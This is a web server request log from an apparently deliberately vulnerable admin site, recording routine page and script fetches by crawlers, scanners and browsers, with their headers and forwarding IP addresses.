Logs

[2026-04-08 17:33:49] Logs page accessed - IP: 172.30.0.12:45846
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 216.73.216.208
Via: 2.0 Caddy
Accept-Encoding: gzip, br, zstd, deflate
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45846
Path: /logs
URL: /logs
Method: GET
[2026-04-08 17:33:49] === HTTP Request ===
[2026-04-08 17:33:02] Login page accessed - IP: 172.30.0.12:45846
===================
X-Forwarded-For: 216.73.216.208
Via: 2.0 Caddy
Accept-Encoding: gzip, br, zstd, deflate
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45846
Path: /login
URL: /login
Method: GET
[2026-04-08 17:33:02] === HTTP Request ===
[2026-04-08 17:33:01] Cabinet page accessed - user_id: , IP: 172.30.0.12:45846
===================
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 216.73.216.208
Via: 2.0 Caddy
Accept-Encoding: gzip, br, zstd, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45846
Path: /cabinet
URL: /cabinet
Method: GET
[2026-04-08 17:33:01] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 216.73.216.208
Via: 2.0 Caddy
Accept-Encoding: gzip, br, zstd, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45846
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-08 17:33:01] === HTTP Request ===
[2026-04-08 17:29:16] Main page accessed - IP: 172.30.0.12:57810
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 46.202.140.154
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57810
Path: /
URL: /
Method: GET
[2026-04-08 17:29:16] === HTTP Request ===
[2026-04-08 17:19:26] Main page accessed - IP: 172.30.0.12:47032
===================
X-Forwarded-Proto: https
X-Forwarded-For: 91.231.89.98
Via: 1.1 Caddy
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip
X-Forwarded-Host: admin.vulnberries.ru
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47032
Path: /
URL: /
Method: GET
[2026-04-08 17:19:26] === HTTP Request ===
[2026-04-08 17:14:35] Main page accessed - IP: 172.30.0.12:45158
===================
X-Forwarded-Proto: https
X-Forwarded-For: 91.196.152.67
Accept-Language: en-US,en;q=0.5
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45158
Path: /
URL: /
Method: GET
[2026-04-08 17:14:35] === HTTP Request ===
===================
Accept-Encoding: gzip, br, deflate
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Openai-Host-Hash: 867116608
X-Forwarded-For: 74.7.230.41
Via: 2.0 Caddy
From: oai-searchbot(at)openai.com
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45158
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-08 17:13:15] === HTTP Request ===
[2026-04-08 17:02:01] Main page accessed - IP: 172.30.0.12:35850
===================
X-Forwarded-For: 45.92.86.144
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:35850
Path: /
URL: /
Method: GET
[2026-04-08 17:02:01] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Accept-Language: en-US,en;q=0.9
Accept: */*;q=0.8
X-Forwarded-Proto: https
X-Forwarded-For: 154.28.229.152
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54362
Path: /static/salary.js
URL: /static/salary.js
Method: GET
[2026-04-08 16:45:54] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Encoding: gzip, deflate, br
Accept: */*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
X-Forwarded-For: 154.28.229.152
Via: 1.1 Caddy
Accept-Language: en-US,en;q=0.9
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54362
Path: /static/goods.js
URL: /static/goods.js
Method: GET
[2026-04-08 16:45:54] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-For: 154.28.229.152
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
Accept: */*;q=0.8
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54362
Path: /static/cabinet.js
URL: /static/cabinet.js
Method: GET
[2026-04-08 16:45:54] === HTTP Request ===
===================
Sec-Fetch-Mode: navigate
Accept-Encoding: gzip, deflate, br
Accept: */*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
X-Forwarded-For: 154.28.229.152
Via: 1.1 Caddy
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54362
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-04-08 16:45:53] === HTTP Request ===
[2026-04-08 16:45:53] Login page accessed - IP: 172.30.0.12:54352
===================
X-Forwarded-Proto: https
Via: 1.1 Caddy
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 154.28.229.152
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54352
Path: /login
URL: /login
Method: GET
[2026-04-08 16:45:53] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
X-Forwarded-For: 154.28.229.152
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Accept: */*;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54362
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-04-08 16:45:53] === HTTP Request ===
[2026-04-08 16:45:53] Salary page accessed - IP: 172.30.0.12:54336
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 154.28.229.152
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54336
Path: /salary
URL: /salary
Method: GET
[2026-04-08 16:45:53] === HTTP Request ===
[2026-04-08 16:45:53] Logs page accessed - IP: 172.30.0.12:48760
===================
X-Forwarded-For: 154.28.229.152
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Via: 1.1 Caddy
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:48760
Path: /logs
URL: /logs
Method: GET
[2026-04-08 16:45:53] === HTTP Request ===
[2026-04-08 16:45:53] Goods page accessed - IP: 172.30.0.12:48760
===================
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 154.28.229.152
Via: 1.1 Caddy
Accept-Language: en-US,en;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:48760
Path: /goods
URL: /goods
Method: GET
[2026-04-08 16:45:53] === HTTP Request ===
[2026-04-08 16:45:53] Cabinet page accessed - user_id: , IP: 172.30.0.12:48760
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 154.28.229.152
Via: 1.1 Caddy
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Fetch-Mode: navigate
Accept-Language: en-US,en;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:48760
Path: /cabinet
URL: /cabinet
Method: GET
[2026-04-08 16:45:53] === HTTP Request ===
[2026-04-08 16:45:49] Main page accessed - IP: 172.30.0.12:48760
===================
Sec-Fetch-Mode: navigate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
X-Forwarded-For: 154.28.229.152
Via: 1.1 Caddy
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:48760
Path: /
URL: /
Method: GET
[2026-04-08 16:45:49] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: navigate
Accept-Language: en-US,en;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Proto: https
X-Forwarded-For: 154.28.229.152
Via: 1.1 Caddy
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:48760
Path: /https:/fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap
URL: /https%3A/fonts.googleapis.com/css2%3Ffamily%3DInter%3Awght%40400%3B500%3B600%3B700%26display%3Dswap
Method: GET
[2026-04-08 16:45:48] === HTTP Request ===
[2026-04-08 16:45:44] Main page accessed - IP: 172.30.0.12:48760
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 154.28.229.152
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:48760
Path: /
URL: /
Method: GET
[2026-04-08 16:45:44] === HTTP Request ===
[2026-04-08 16:45:31] Main page accessed - IP: 172.30.0.12:48760
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
X-Forwarded-For: 154.28.229.152
Via: 1.1 Caddy
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:48760
Path: /
URL: /
Method: GET
[2026-04-08 16:45:31] === HTTP Request ===
[2026-04-08 16:45:26] Main page accessed - IP: 172.30.0.12:48760
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 104.252.191.224
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Proto: https
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:48760
Path: /
URL: /
Method: GET
[2026-04-08 16:45:26] === HTTP Request ===
[2026-04-08 16:38:10] Main page accessed - IP: 147.185.132.150:59294
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: cf.vulnberries.ru
RemoteAddr: 147.185.132.150:59294
Path: /
URL: /
Method: GET
[2026-04-08 16:38:10] === HTTP Request ===
[2026-04-08 16:27:34] Main page accessed - IP: 172.30.0.12:37436
===================
User-Agent: Go-http-client/1.1
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 104.23.239.84
Cf-Worker: hwzw530156d6uygp.workers.dev
Cf-Ew-Via: 15
Cdn-Loop: cloudflare; loops=1
Accept-Encoding: gzip, br
Via: 2.0 Caddy
Cf-Ray: 9e92a3e22ea91d0c-FRA
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37436
Path: /
URL: /
Method: GET
[2026-04-08 16:27:34] === HTTP Request ===
[2026-04-08 16:27:29] Main page accessed - IP: 172.30.0.12:37436
===================
User-Agent: Go-http-client/1.1
X-Forwarded-For: 172.71.172.61
Via: 2.0 Caddy
Cf-Worker: hwzw530156d6uygp.workers.dev
Cdn-Loop: cloudflare; loops=1
Accept-Encoding: gzip, br
Cf-Ray: 9e92a3c0587ad362-FRA
Cf-Ew-Via: 15
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37436
Path: /
URL: /
Method: GET
[2026-04-08 16:27:29] === HTTP Request ===
===================
Accept: */*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 107.172.195.5
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57954
Path: /static/goods.js
URL: /static/goods.js
Method: GET
[2026-04-08 16:12:41] === HTTP Request ===
===================
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept: */*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
X-Forwarded-For: 107.172.195.5
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57954
Path: /static/salary.js
URL: /static/salary.js
Method: GET
[2026-04-08 16:12:41] === HTTP Request ===
===================
X-Forwarded-For: 107.172.195.5
Accept-Language: en-US,en;q=0.9
Accept: */*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57954
Path: /static/defects.js
URL: /static/defects.js
Method: GET
[2026-04-08 16:12:41] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
Accept: */*;q=0.8
X-Forwarded-Proto: https
X-Forwarded-For: 107.172.195.5
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57954
Path: /static/cabinet.js
URL: /static/cabinet.js
Method: GET
[2026-04-08 16:12:40] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 107.172.195.5
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Accept: */*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34916
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-04-08 16:12:37] === HTTP Request ===
===================
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 107.172.195.5
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Accept: */*;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34916
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-04-08 16:12:37] === HTTP Request ===
[2026-04-08 16:12:37] Login page accessed - IP: 172.30.0.12:34916
===================
X-Forwarded-Proto: https
X-Forwarded-For: 107.172.195.5
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34916
Path: /login
URL: /login
Method: GET
[2026-04-08 16:12:37] === HTTP Request ===
[2026-04-08 16:12:37] Logs page accessed - IP: 172.30.0.12:57954
===================
X-Forwarded-Proto: https
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
X-Forwarded-For: 107.172.195.5
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57954
Path: /logs
URL: /logs
Method: GET
[2026-04-08 16:12:37] === HTTP Request ===
[2026-04-08 16:12:36] Salary page accessed - IP: 172.30.0.12:57954
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
X-Forwarded-For: 107.172.195.5
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57954
Path: /salary
URL: /salary
Method: GET
[2026-04-08 16:12:36] === HTTP Request ===
[2026-04-08 16:12:36] Goods page accessed - IP: 172.30.0.12:57954
===================
X-Forwarded-For: 107.172.195.5
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57954
Path: /goods
URL: /goods
Method: GET
[2026-04-08 16:12:36] === HTTP Request ===
[2026-04-08 16:12:36] Defects page accessed - IP: 172.30.0.12:57954
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
X-Forwarded-Proto: https
X-Forwarded-For: 107.172.195.5
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57954
Path: /defects
URL: /defects
Method: GET
[2026-04-08 16:12:36] === HTTP Request ===
[2026-04-08 16:12:36] Cabinet page accessed - user_id: , IP: 172.30.0.12:57954
===================
Sec-Fetch-Mode: navigate
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 107.172.195.5
Via: 1.1 Caddy
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
